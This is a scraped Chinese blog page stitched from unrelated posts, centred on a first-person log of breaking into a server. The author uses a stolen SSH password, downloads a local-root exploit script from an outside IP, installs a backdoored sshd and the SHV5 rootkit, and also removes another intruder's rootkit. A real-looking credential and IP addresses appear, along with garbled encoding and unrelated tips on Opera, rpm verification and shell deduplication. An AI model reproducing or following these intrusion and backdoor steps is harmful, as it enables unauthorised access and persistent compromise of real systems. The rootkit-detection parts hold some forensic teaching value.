设置Opera在后台打开标签页
地址栏:
opera:config
回车
User Prefs->Open New Window in Background,选中,然后保存
还有一个方法:
在浏览器地址输入Opera:config, 把Target Destination为2可以实现从后台打开网页功能,
注意:改完一定要点保存哦,保存按钮好像点击上面的所有都表示CHECKBOX才会出来,
刚开始我搞了好几次才成功……,和Firefox有点像!
参考:http://www.blogjava.net/daipan/archive/2008/08/18/222772.html
by:vitter
blog:blog.securitycn.net
今天发现一台肉鸡上某人的ssh连到另外一台服务器上,记录下了密码。
[root@mail ~]# cat /tmp/sshpswd
ldc:sle823jfsGs@222.222.66.11
直接ssh上去。
[root@mail ~]# ssh ldc@222.222.66.11
ldc@222.222.66.11’s password:
Last login: Fri Jul 17 13:11:38 2009 from 221.140.140.200
[ldc@localhost ldc]$ cat /etc/issue
Red Hat Enterprise Linux Server release 5 (Tikanga)
Kernel \r on an \m
[ldc@localhost ldc]$ uname -a
Linux localhost.localdomain 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686 i686 i386 GNU/Linux
是rhel5.0没升级过内核,vmsplice的local root应该可以的,不过测试了下,机器挂了,换udev的好了。
[ldc@localhost ldc]$ mkdir .v
[ldc@localhost ldc]$ cd .v
[ldc@localhost .v]$ wget http://211.100.50.70/u.sh
–13:21:09– http://211.100.50.70/u.sh
Connecting to 211.100.50.70:80… 宸茶繛鎺ャ€
宸插彂鍑?HTTP 璇锋眰锛屾�鍦ㄧ瓑寰呭洖搴?.. 200 OK
闀垮害锛?366 (3.3K) [application/x-sh]
Saving to: `u.sh’
100%[===========================================================================================>] 3,366 –.-K/s in 0.04s
13:21:09 (93.7 KB/s) – `u.sh’ saved [3366/3366]
[ldc@localhost .v]$ ls
r00t r00t.c u.sh
[ldc@localhost .v]$ chmod +x u.sh
[ldc@localhost .v]$ cat /proc/net/netlink
sk Eth Pid Groups Rmem Wmem Dump Locks
f69f8800 0 2486 00000111 0 0 00000000 2
f7fdae00 0 0 00000000 0 0 00000000 2
c2132200 6 0 00000000 0 0 00000000 2
f6a57a00 7 2143 00000001 0 0 00000000 2
f7caf000 7 0 00000000 0 0 00000000 2
f6a0be00 9 2143 00000000 0 0 00000000 2
f6a61200 9 1996 00000000 0 0 00000000 2
f7de1c00 9 0 00000000 0 0 00000000 2
f7d6ca00 10 0 00000000 0 0 00000000 2
f7fb3200 11 0 00000000 0 0 00000000 2
c2154200 15 476 ffffffff 0 0 00000000 2
f7fdac00 15 0 00000000 0 0 00000000 2
f7fb3000 16 0 00000000 0 0 00000000 2
c21cde00 18 0 00000000 0 0 00000000 2
[ldc@localhost .v]$ ps aux | grep udev
root 477 0.0 0.0 2916 1396 ? S< 12:36 0:00 /sbin/udevd -d
ldc 3462 0.0 0.0 4128 680 pts/0 S 13:00 0:00 grep udev
[ldc@localhost .v]$ sh u.sh 476
suid.c: 鍦ㄥ嚱鏁?鈥榤ain鈥?涓�細
suid.c:3: 璀﹀憡锛氶殣寮忓0鏄庝笌鍐呭缓鍑芥暟 鈥榚xecl鈥?涓嶅吋瀹
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
已经是root权限了。
sh-3.1# w
13:25:18 up 48 min, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
ldc pts/0 100.204.107.20 13:05 0.00s 0.12s 0.06s sshd: ldc [priv]
sh-3.1# pwd
/home/ldc/.v
sh-3.1# ssh -V
OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
我们先留个ssh的后门。
sh-3.1# wget http://211.100.50.70/openssh4.3p2.tar.gz
–13:32:08– http://211.100.50.70/openssh4.3p2.tar.gz
Connecting to 211.100.50.70:80… 宸茶繛鎺ャ€
宸插彂鍑?HTTP 璇锋眰锛屾�鍦ㄧ瓑寰呭洖搴?.. 200 OK
闀垮害锛?79990 (957K) [application/x-gzip]
Saving to: `openssh4.3p2.tar.gz’
100%[===========================================================================================>] 979,990 1.14M/s in 0.8s
13:32:08 (1.14 MB/s) – `openssh4.3p2.tar.gz’ saved [979990/979990]
sh-3.1# tar zxf openssh4.3p2.tar.gz
sh-3.1# cd openssh-4.3p2/
sh-3.1# ./configure –prefix=/usr –sysconfdir=/etc/ssh
checking for gcc… gcc
checking for C compiler default output file name… a.out
…………(省略若干行)
sh-3.1# make && make install
conffile=`echo sshd_config.out | sed ‘s/.out$//’`; \
/bin/sed -e ‘s|/etc/ssh/ssh_prng_cmds|/etc/ssh/ssh_prng_cmds|g’ -e
…………(省略若干行)
sh-3.1# cp ssh_config sshd_config /etc/ssh/
sh-3.1# /etc/rc.d/init.d/sshd restart
鍋滄� sshd锛 [纭�畾]
鍚�姩 sshd锛 [纭�畾]
ok了,用我们的sshdoor登录。
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh
[root@localhost ~]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
tcp 0 0 0.0.0.0:1000 0.0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 2883/vsftpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2303/python
总感觉这系统怪怪的,连22端口都看不到,应该替换了netstat了,先看看有没有其他被替换掉的系统文件吧。
[root@localhost ~]# rpm -qaV
S.5..UG. /bin/netstat
S.5..UG. /sbin/ifconfig
S.5….T /usr/bin/ssh-keygen
S.5….T c /etc/sysconfig/system-config-securitylevel
S.5..UG. /usr/sbin/lsof
.M…… /var/tux
S.5….T c /etc/inittab
S.5….T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_dl14.map
S.5….T /usr/share/texmf-var/fonts/map/dvipdfm/updmap/dvipdfm_ndl14.map
S.5….T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_dl14.map
S.5….T /usr/share/texmf-var/fonts/map/pdftex/updmap/pdftex_ndl14.map
S.5….T /usr/share/texmf-var/web2c/aleph.fmt
S.5….T /usr/share/texmf-var/web2c/amstex.fmt
S.5….T /usr/share/texmf-var/web2c/bamstex.fmt
S.5….T /usr/share/texmf-var/web2c/bplain.fmt
S.5….T /usr/share/texmf-var/web2c/cont-en.fmt
S.5….T /usr/share/texmf-var/web2c/etex.fmt
..5….T /usr/share/texmf-var/web2c/metafun.mem
S.5….T /usr/share/texmf-var/web2c/mf.base
..5….T /usr/share/texmf-var/web2c/mpost.mem
S.5….T /usr/share/texmf-var/web2c/mptopdf.fmt
S.5….T /usr/share/texmf-var/web2c/omega.fmt
S.5….T /usr/share/texmf-var/web2c/pdfetex.fmt
S.5….T /usr/share/texmf-var/web2c/pdftex.fmt
S.5….T /usr/share/texmf-var/web2c/tex.fmt
…….T c /etc/kdump.conf
S.5….T c /etc/printcap
..5….T c /etc/pki/nssdb/secmod.db
….L… c /etc/pam.d/system-auth
.M…… c /etc/cups/classes.conf
…….T c /etc/audit/auditd.conf
missing /usr/sbin/nscd
S.5….T c /etc/sysconfig/named
.M…… /var/named
SM5..UG. /bin/ps
SM5..UG. /usr/bin/top
SM5….T c /etc/sysconfig/iptables-config
S.5..UG. /usr/bin/find
prelink: /usr/lib/libGL.so.1.2.#prelink#.crFdQJ Could not trace symbol resolving
S.?….. /usr/lib/libGL.so.1.2
S.5….T c /etc/ppp/chap-secrets
S.5….T c /etc/ppp/pap-secrets
S.5….T c /etc/xml/catalog
S.5….T c /usr/share/sgml/docbook/xmlcatalog
S.5….T c /etc/ssh/ssh_config
S.5….T /usr/bin/scp
S.5….T /usr/bin/sftp
S.5….T /usr/bin/ssh
S.5….T /usr/bin/ssh-add
SM5…GT /usr/bin/ssh-agent
S.5….T /usr/bin/ssh-keyscan
S.5….T /usr/share/texmf-var/fonts/map/dvips/updmap/builtin35.map
S.5….T /usr/share/texmf-var/fonts/map/dvips/updmap/download35.map
S.5….T /usr/share/texmf-var/fonts/map/dvips/updmap/ps2pk.map
S.5….T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_pk.map
S.5….T /usr/share/texmf-var/fonts/map/dvips/updmap/psfonts_t1.map
S.5….T /etc/sgml/docbook-slides.cat
S.5….T /usr/share/icons/hicolor/icon-theme.cache
S.5..UG. /bin/ls
S.5..UG. /usr/bin/dir
S.5..UG. /usr/bin/md5sum
S.5..UG. /usr/bin/pstree
S.5….T c /etc/syslog.conf
S.5….T c /etc/ssh/sshd_config
S.5….T /usr/sbin/sshd
missing /var/lib/texmf/ls-R
S.5….T /etc/sgml/docbook-simple.cat
S.5….T c /etc/vsftpd/vsftpd.conf
.M…… /var/ftp/pub
S.5….T c /etc/mailcap
……G. /var/cache/samba/winbindd_privileged
…….T c /etc/mail/sendmail.cf
SM5….T c /etc/mail/submit.cf
S.5….T c /var/log/mail/statistics
..5….T c /usr/lib/security/classpath.security
S.5….T c /etc/sane.d/dll.conf
还好rpm没替换,看来系统的好些命令被替换了,嘿嘿,有同行在啊。
不好意思,那我就要T你下去了。下面先检查一下,当然这个系统不可靠了,我们先替换回可靠的命令:
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
cp: cannot remove `/usr/bin/dir’: Operation not permitted
chattr加了iau了。
[root@localhost bin]# chattr -iau /usr/bin/dir
[root@localhost bin]# cp -f /home/ldc/.v/dir /usr/bin/dir
ok了。看看还有什么吧:
[root@localhost chkrootkit-0.48]# lsattr /bin /sbin /usr/bin /usr/sbin /etc| grep -e -ia
s—ia——- /bin/ps
s—ia——- /bin/ls
s—ia——- /bin/netstat
s—ia——- /sbin/ifconfig
s—ia——- /sbin/ttymon
s—ia——- /sbin/ttyload
s—ia——- /usr/bin/top
s—ia——- /usr/bin/md5sum
s—ia——- /usr/bin/pstree.x11
s—ia——- /usr/bin/find
s—ia——- /usr/bin/dir
s—ia——- /usr/bin/pstree
s—ia——- /usr/sbin/lsof
s—ia——- /usr/sbin/ttyload
s—ia——- /etc/sh.conf
[root@localhost bin]# chattr -iau ps ls netstat
[root@localhost bin]# rm -rf ps ls netstat
[root@localhost bin]# rz
rz waiting to receive.奫root@localhost bin]# chmod +x ps ls netstat
[root@localhost bin]# chattr +iau ps ls netstat
同样的方式把/usr/sbin/lsof、/usr/bin/find等都替换回来。
再用netstat看看端口吧:
[root@localhost bin]# netstat -lntp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:2208 0.0.0.0:* LISTEN 2298/hpiod
tcp 0 0 0.0.0.0:1000 0.0.0.0:* LISTEN 2090/rpc.statd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2056/portmap
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 2883/vsftpd
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2315/cupsd
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2361/sendmail: acce
tcp 0 0 0.0.0.0:65530 0.0.0.0:* LISTEN 2663/ttyload (有东东出来了吧)
tcp 0 0 127.0.0.1:2207 0.0.0.0:* LISTEN 2303/python
tcp 0 0 :::22 :::* LISTEN 13935/sshd
现在再用chkrootkit和rkhunter查一下看看:
[root@localhost .v]# ls
chkrootkit-0.48 chkrootkit.tar.gz rkhunter rkhunter-1.2.7.tar.gz
[root@localhost .v]# cd chkrootkit-0.48/
[root@localhost chkrootkit-0.48]# ./chkrootkit
ROOTDIR is `/’
Checking `amd’… not found
Checking `basename’… not infected
…………(省略若干行)
Checking `ifconfig’… INFECTED
…………(省略若干行)
Checking `pstree’… INFECTED
…………(省略若干行)
Checking `top’… INFECTED
…………(省略若干行)
Searching for t0rn’s v8 defaults… Possible t0rn v8 \(or variation\) rootkit installed
…………(省略若干行)
Searching for Showtee… Warning: Possible Showtee Rootkit installed
…………(省略若干行)
Searching for Romanian rootkit… /usr/include/file.h /usr/include/proc.h
…………(省略若干行)
上面几行都是有问题的。
下面用rkhunter,它的log存在/var/log/rkhunter.log里面
[root@localhost rkhunter]# /usr/local/bin/rkhunter -c –createlogfile
Rootkit Hunter 1.2.7 is running
Determining OS… Unknown
Warning: This operating system is not fully supported!
Warning: Cannot find md5_not_known
All MD5 checks will be skipped! (md5sum被替换了)
…………(省略若干行)
Rootkit ‘SHV4’… [ Warning! ] (SHV4)
——————————————————————————–
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
–createlogfile and check the log file (current file: /var/log/rkhunter.log).
——————————————————————————–
[Press <ENTER> to continue]
Rootkit ‘SHV5’… [ Warning! ] (SHV5)
——————————————————————————–
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
–createlogfile and check the log file (current file: /var/log/rkhunter.log).
——————————————————————————–
…………(省略若干行)
Scanning took 84 seconds
Scan results written to logfile (/var/log/rkhunter.log)
———————————————————————–
Do you have some problems, undetected rootkits, false positives, ideas
or suggestions?
Please e-mail me by filling in the contact form (@http://www.rootkit.nl)
———————————————————————–
下面我们看下log:
[root@localhost rkhunter]# cat /var/log/rkhunter.log
[15:16:51] Running Rootkit Hunter 1.2.7 on localhost.localdomain
[15:16:51]
Rootkit Hunter 1.2.7, Copyright 2003-2005, Michael Boelen
…………(省略若干行)
[15:16:55] *** Start scan SHV4 ***
[15:16:55] – File /etc/ld.so.hash… OK. Not found.
[15:16:55] – File /lib/libext-2.so.7… OK. Not found.
[15:16:55] – File /lib/lidps1.so… WARNING! Exists. (找到一个文件)
[15:16:55] – File /usr/sbin/xntps… OK. Not found.
[15:16:55] – Directory /lib/security/.config… OK. Not found.
[15:16:55] – Directory /lib/security/.config/ssh… OK. Not found.
[15:17:04] *** Start scan SHV5 ***
[15:17:04] – File /etc/sh.conf… WARNING! Exists. (找到一个文件)
[15:17:04] – File /dev/srd0… OK. Not found.
[15:17:04] – Directory /usr/lib/libsh… WARNING! Exists. (找到一个目录)
…………(省略若干行)
下面手工核对下,因为工具都是对已有的检查,如果改过的,他就找不到了。
[root@localhost sbin]# netstat -anp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:65530 0.0.0.0:* LISTEN 2663/ttyload
…………(省略若干行)
raw 0 0 0.0.0.0:1 0.0.0.0:* 7 2679/ttymon
…………(省略若干行)
发现2个不正常的
[root@localhost sbin]# ps aux|grep 2663
root 2663 0.0 0.0 2128 516 ? Ss 12:37 0:00 /sbin/ttyload -q (原型出来了)
root 15350 0.0 0.0 4088 604 pts/0 S+ 15:21 0:00 grep 2663
[root@localhost sbin]# lsof -p 2663
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
3 2663 root cwd DIR 253,0 4096 2 /
3 2663 root rtd DIR 253,0 4096 2 /
3 2663 root txt REG 253,0 652620 34897965 /tmp/sh-AQJ3OQYACSO (deleted) (是个压缩的)
3 2663 root mem REG 253,0 121684 8586729 /lib/ld-2.5.so
3 2663 root mem REG 253,0 1576952 8586730 /lib/libc-2.5.so
3 2663 root mem REG 253,0 101036 8586743 /lib/libnsl-2.5.so
3 2663 root mem REG 253,0 15264 8586757 /lib/libutil-2.5.so
3 2663 root mem REG 253,0 27836 8585303 /lib/libcrypt-2.5.so
3 2663 root 0u CHR 1,3 1517 /dev/null
3 2663 root 1u CHR 1,3 1517 /dev/null
3 2663 root 2u CHR 1,3 1517 /dev/null
3 2663 root 3u IPv4 9895 TCP *:65530 (LISTEN)
[root@localhost sbin]# lsof -p 2679
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
ttymon 2679 root cwd DIR 253,0 4096 2 /
ttymon 2679 root rtd DIR 253,0 4096 2 /
ttymon 2679 root txt REG 253,0 93476 852119 /sbin/ttymon
ttymon 2679 root mem REG 253,0 46740 8585257 /lib/libnss_files-2.5.so
ttymon 2679 root mem REG 253,0 121684 8586729 /lib/ld-2.5.so
ttymon 2679 root mem REG 253,0 1576952 8586730 /lib/libc-2.5.so
ttymon 2679 root 3u raw 9925 00000000:0001->00000000:0000 st=07
监听65530端口的是个ssh后门:
[root@localhost sbin]# nc 127.0.0.1 65530
SSH-1.5-2.0.13
Protocol mismatch.
密码应该在:
[root@localhost sbin]# cat /etc/sh.conf
76800957735704ee3dd8ac42779db49a –
加密了,我们再看看另外一个配置文件:
[root@localhost sbin]# cat /lib/lidps1.so
ttyload
shsniff
shp
shsb
hide
burim
synscan
mirkforce
ttymon
sh2-power
看来是ps的配置文件。
看看另外一个进程:
[root@localhost sbin]# strings /sbin/ttymon
…………(省略若干行)
Usage: %s <dst> <src> <size> <number>
Ports are set to send and receive on port 179
dst: Destination Address
src: Source Address
size: Size of packet which should be no larger than 1024 should allow for xtra header info thru routes
num: packets
Could not resolve %s fucknut
根据这个Google了下,应该是个dos工具。感兴趣的可以编译下玩玩看看:http://www.securityfocus.com/archive/82/334848这里有。
ok我们现在进入黑客的老巢:
[root@localhost sbin]# cd /usr/lib/libsh
[root@localhost libsh]# ls -al
total 140
drwxr-xr-x 6 root root 4096 Dec 18 2008 .
drwxr-xr-x 118 root root 69632 Jul 17 13:55 ..
drwxr-xr-x 2 root root 4096 Dec 18 2008 .backup
-rwxr-xr-x 1 122 114 1206 Apr 18 2003 .bashrc
-rwxr-xr-x 1 122 114 2000 Nov 28 2006 hide
drwxr-xr-x 2 root root 4096 Dec 18 2008 .owned
-rwxr-xr-x 1 122 114 1345 Nov 28 2006 shsb
drwxr-xr-x 2 root root 4096 Jul 14 04:03 .sniff
drwxr-xr-x 2 gaobo gaobo 4096 Nov 28 2006 utilz
[root@localhost libsh]# ls .backup/
dir find ifconfig ls lsof md5sum netstat ps pstree top
上面就是我们系统备份的文件,直接恢复即可。
find搜下其他的配置文件。此步骤省略。最后都找到了:
[root@localhost libsh]# find / -nouser
/lib/libsh.so/shhk.pub
/lib/libsh.so/shhk
/lib/libsh.so/shrs
…………(省略若干行)
[root@localhost libsh]# cd /lib/libsh.so/
[root@localhost libsh.so]# ls
bash shdcf shhk shhk.pub shrs
这个目录是ssh的配置文件
其他的用关键字就可以了:如find / -name “*” -exec grep -l “ttyload” {} \;
[root@localhost lib]# cat /usr/include/proc.h
3 burim
3 mirkforce
3 synscan
3 ttyload
3 shsniff
3 ttymon
3 shsb
3 shp
3 hide
4 ttyload
[root@localhost lib]# cat /usr/include/file.h
sh.conf
libsh
.sh
system
shsb
libsh.so
shp
shsniff
srd0
[root@localhost lib]# cat /usr/include/hosts.h
2 212.110
2 195.26
2 194.143
2 62.220
3 2002
4 2002
3 6667
4 6667
3 65530
4 65530
[root@localhost lib]# cat /usr/include/log.h
mirkforce
synscan
syslog
那看看他怎么启动的:
[root@localhost lib]# cat /etc/inittab
#
# inittab This file describes how the INIT process should set up
# the system in a certain run-level.
#
# Author: Miquel van Smoorenburg, <miquels@drinkel.nl.mugnet.org>
# Modified for RHS Linux by Marc Ewing and Donnie Barnes
#
# Default runlevel. The runlevels used by RHS are:
# 0 – halt (Do NOT set initdefault to this)
# 1 – Single user mode
# 2 – Multiuser, without NFS (The same as 3, if you do not have networking)
# 3 – Full multiuser mode
# 4 – unused
# 5 – X11
# 6 – reboot (Do NOT set initdefault to this)
#
id:5:initdefault:
# System initialization.
si::sysinit:/etc/rc.d/rc.sysinit
l0:0:wait:/etc/rc.d/rc 0
l1:1:wait:/etc/rc.d/rc 1
l2:2:wait:/etc/rc.d/rc 2
l3:3:wait:/etc/rc.d/rc 3
l4:4:wait:/etc/rc.d/rc 4
l5:5:wait:/etc/rc.d/rc 5
l6:6:wait:/etc/rc.d/rc 6
# Trap CTRL-ALT-DELETE
ca::ctrlaltdel:/sbin/shutdown -t3 -r now
# When our UPS tells us power has failed, assume we have a few minutes
# of power left. Schedule a shutdown for 2 minutes from now.
# This does, of course, assume you have powerd installed and your
# UPS connected and working correctly.
pf::powerfail:/sbin/shutdown -f -h +2 “Power Failure; System Shutting Down”
# If power was restored before the shutdown kicked in, cancel it.
pr:12345:powerokwait:/sbin/shutdown -c “Power Restored; Shutdown Cancelled”
# Run xdm in runlevel 5
x:5:respawn:/etc/X11/prefdm -nodaemon
# Loading standard ttys
0:2345:once:/usr/sbin/ttyload (在这里了)
# Run gettys in standard runlevels
1:2345:respawn:/sbin/mingetty tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
# modem getty.
# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem
# fax getty (hylafax)
# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem
# vbox (voice box) getty
# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6
# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7
# end of /etc/inittab
看看他的启动文件:
[root@localhost lib]# cat /usr/sbin/ttyload
/sbin/ttyload -q >/dev/null 2>&1
/sbin/ttymon >/dev/null 2>&1
以上除了工具,我们通过手工的方式对rootkit进行了一些简单的分析,这个是个没有修改过的SHV5。以上只是一些思路,在对待入侵问题上要具体问题具体分析,这个相对简单了点。
下面我们测试下这个SHV5:
[root@localhost .v]# wget http://211.100.50.70/shv5.tar.gz
解压、安装:
[root@localhost .v]# tar zxf shv5.tar.gz
[root@localhost .v]# cd shv5
[root@localhost shv5]# ls
bin.tgz conf.tgz lib.tgz README setup utilz.tgz
[root@localhost shv5]# cat README
############
### shv5 ###
############
MMMMMMM MMMMMMMMMMMMMMM
MMMMMMM MMMMMMMMMMMMMMM
MMMMMMM MMMMMMMMMMMMMMM
MMMMMMM MMMMMMMMMMMMMMM
MMMMMMM MMMMMM
MMMMMM MMMMMMMMMMMMMMMM MMMMMMM MMMMMMM MMMMMM
MMMMMMMM MMMMMMMMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMMM
MMMMMMMMM MMMMMMMMMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMMMMM
MMMMMMMMMM MMMMMMMMMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMM
MMMMMMM MMMMMMM MMMMMMM MMMMMMM MMMMMMM MMMMMMMM
MMMMMMM MMMMMMM MMMMMMM MMMMMM MMMMMM MMMMMMMM
MMMMMMM MMMMMMM MMMMMMM MMMMMMM MMMMMMM MMMMMMMM
MMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMMMMM MMM MMMMMMMM
MMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMMMM MMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMMMM MMMMMMMMMMMMMMM
MMMMMMMMMM MMMMMMM MMMMMMM MMMMMMMMM MMMMMMMMMMMMM
MMMMMMMM MMMMMMM MMMMMMM MMMMM MMMMMMM
DISCLAIMER:
* The purpose of these coded instructions, statements and computer
* programs is for TEST AIMS ONLY !
* Their use/misuse is at USERS OWN RISK !
* We do not take any responsibility for any harm or damage caused
* by the use of this file-package.
* This includes copying, duplicating or modifying it in any form !
* USERS WHO USE THIS CODED INSTRUCTIONS, STATEMENTS AND COMPUTER
* PROGRAMS MUST ACCEPT ALL ABOVE STATEMENTS !
* OTHERWISE U ARE OBLIGED TO DELETE THESE FILES IMEDIATELY !
CHANGES [shv5]:
-> – new sshd backdor with env-settings (avoids history logging)
– The new sshd is in between 1.2.25-2.0.13 SSHD (from ssh.com)
– not so big and with new great features designed to suite shv5.
-> new rk-dirs coz of lamme anti-shv4 release
-> new security-checks on the script
– latest flaws included (mod_ssl, samba, sendmail etc..)
-> setup-script rewriten to become more soft (friendly)
-> added new addons (tripwire, snort … fucker :))
-> added basic utilz on rootkit (i hate dld them on each box)
-> we use md5sum passwords now (more l33t and secure)
USAGE:
-> – If u expect me to tell you how/what/if/when/where type of
– questions delete these files imediately! This is not for you!
TODO:
-> tcpdump trojan
-> crontab trojan
-> sendmail backdoor
-> ftp backdoor
-> httpd backdoor
-> any other idea ?!?!?! < mail: pint@dosnet.info >
[root@localhost shv5]# ./setup sshdoor 8585
[sh]# Installing shv5 … this wont take long
[sh]# If u think we will patch your holes shoot yourself !
[sh]# so patch manualy and fuck off!
============================================================================
MMMMM MMMMMM
MMM MMMMMMMMM MMMM MMMM MMM [*] Presenting u shv5-rootkit !
MMM MMMM MMMM MMMM MMMM MMM [*] Designed for internal use !
MMM MMMMMMM MMMMMMMMMMMM MMM
MMM MMMMMMMM MMMMMMMMMMMM MMM [*] brought to you by: PinT[x]
MMM MMMM MMMM MMMM MMM [*] April ) 2003 )
MMM MMMM MMMM MMMM MMMM MMM
MMM MMMMMMMMM MMMM MMMM MMM [*] *** VERY PRIVATE ***
MMM MMM [*] *** so dont distribute ***
MMMMM -C- -R- -E- -W- MMMMMM
============================================================================
[sh]# backdooring started on localhost.localdomain
[sh]#
[sh]#
[sh]# checking for remote logging… guess not.
[sh]# checking for tripwire… guess not.
[sh]# [Installing trojans….]
[sh]# Using Password : sshdoor
[sh]# Using ssh-port : 8585
mkdir: cannot create directory `/usr/lib/libsh’: File exists
mkdir: cannot create directory `/usr/lib/libsh/.backup’: File exists
[sh]# : ps/ls/top/netstat/ifconfig/find/ and rest backdoored
[sh]#
[sh]# [Installing some utils…]
[sh]# : mirk/synscan/others… moved
[sh]# [Moving our files…]
mkdir: cannot create directory `/usr/lib/libsh/.sniff’: File exists
[sh]# : sniff/parse/sauber/hide moved
[sh]# [Modifying system settings to suite our needs]
[sh]# Checking for vuln-daemons …
Unknown HZ value! (194) Assume 100.
[sh]# RPC.STATD found – patch it bitch !!!!
mkdir: cannot create directory `/usr/lib/libsh/.owned’: File exists
——————————————————————–
[sh]# [System Information…]
[sh]# Hostname : localhost.localdomain (222.222.66.11)
[sh]# Arch : 2007 -+- bogomips : 6003.55
5999.45 ‘
[sh]# Alternative IP : 127.0.0.1 -+- Might be [1 ] active adapters.
[sh]# Distribution: Red Hat Enterprise Linux Server release 5 (Tikanga)
——————————————————————–
[sh]# ipchains … ?
[sh]# lucky for u no ipchains found
——————————————————————–
[sh]# iptables …?
iptables: No chain/target/match by that name
——————————————————————–
[sh]# Just ignore all errors if any !
[sh]# ============================== Backdooring completed in :3 seconds
[root@localhost shv5]# nc 127.0.0.1 8585
SSH-1.5-2.0.13
Protocol mismatch.
根据SHV5的setup脚本我们可以稍微改下变成自动卸载的脚本,之后附在文后。
累死了,赶紧回家休息。
本博原创,如转载请注明出处:http://blog.vfocus.net,谢谢。
本文的引用网址:
http://www.vfocus.net/blog/mt-tb.cgi/417
用rpm进行包管理的发行版中(redhat,suse等),可以利用rpm -V可以校验某个文件或者某个包,检验其状态和安装时的变化情况。检验项目共九项,结果以下面8个字母来表示:
S : 表示文件大小;
M : 表示权限;
5 : 表示MD5检查和;
D : 表示主从设备号;
L : 表示符号连接;
U : 表示属主;
G : 表示属组;
T : 表示最后修改时间根据文件类型的不同检验的项目也不同,如图
文件类型 大小 权限 MD5和 主设备号 从设备号 符号连接 属主 属组 最后修改时间
目录 – 校 – – – – 校 校 –
符号连接 – 校 – – – 校 校 校 –
FIFO – 校 – – – – 校 校 –
设备文件 – 校 – 校 校 – 校 校 –
普通文件 校 校 校 – – – 校 校 校
例如,查询bash包
# rpm -V bash
S.5….T /etc/bashrc
结果表达的意思是:
1.bash包里除/etc/bashrc之外其他文件都没有变化,因此没有列出来。
2./etc/bashrc文件的大小发生了变化 (S)
3./etc/bashrc文件的MD5校验和发生变化 (5)
4./etc/bashrc文件的最后修改时间发生变化 (T)
转载自:http://www.oolec.com/rpm-v-intro/
在进行文本处理的时候,我们经常遇到要删除重复行的情况。那怎么解决呢?
下面就是三种常见方法?
第一,用sort+uniq,注意,单纯uniq是不行的。
shell> sort file | uniq
这里我做了个简单的测试,当file中的重复行不再一起的时候,uniq将服务删除所有的重复行。经过排序后,所有相同的行都在相邻,因此unqi可以正常删除重复行。
第二,用sort+awk命令,注意,单纯awk同样不行,原因同上。
shell> sort file | awk ‘{if ($0!=line) print;line=$0}’
当然,自己把管道后面的代码重新设计一下,可能不需要sort命令先排序拉。
第三,用sort+sed命令,同样需要sort命令先排序。
shell> sort file | sed ‘$!N; /^\(.*\)\n\1$/!P; D’
最后附一个必须先用sort排序的文本的例子,当然,这个需要用sort排序的原因是很简单,就是后面算法设计的时候的“局部性”,相同的行可能分散出现在不同的区域,一旦有新的相同行出现,那么前面的已经出现的记录就被覆盖了,看了这个例子就好理解拉。
ffffffffffffffffff
ffffffffffffffffff
eeeeeeeeeeeeeeeeeeee
fffffffffffffffffff
eeeeeeeeeeeeeeeeeeee
eeeeeeeeeeeeeeeeeeee
gggggggggggggggggggg
其实,这是我随便打进去的几行字,没想到就是必须用sort的很好例子,大家可以自己试试看。
参考资料:
[1] SED单行脚本快速参考
http://linux.chinaitlab.com/administer/381792.html
[2] 如何删除重复的行(sed或awk)
http://www.linuxsir.org/bbs/showthread.php?t=132848
转载自:http://www.91linux.com/html/article/shell/20090205/15636.html
安装ndoutils-1.4b9时报以下错
# ./configure –enable-mysql –with-mysql=/usr/local/mysql
# make
cd ./src && make
make[1]: Entering directory `/root/nagiosddd/ndoutils-1.4b9/src’
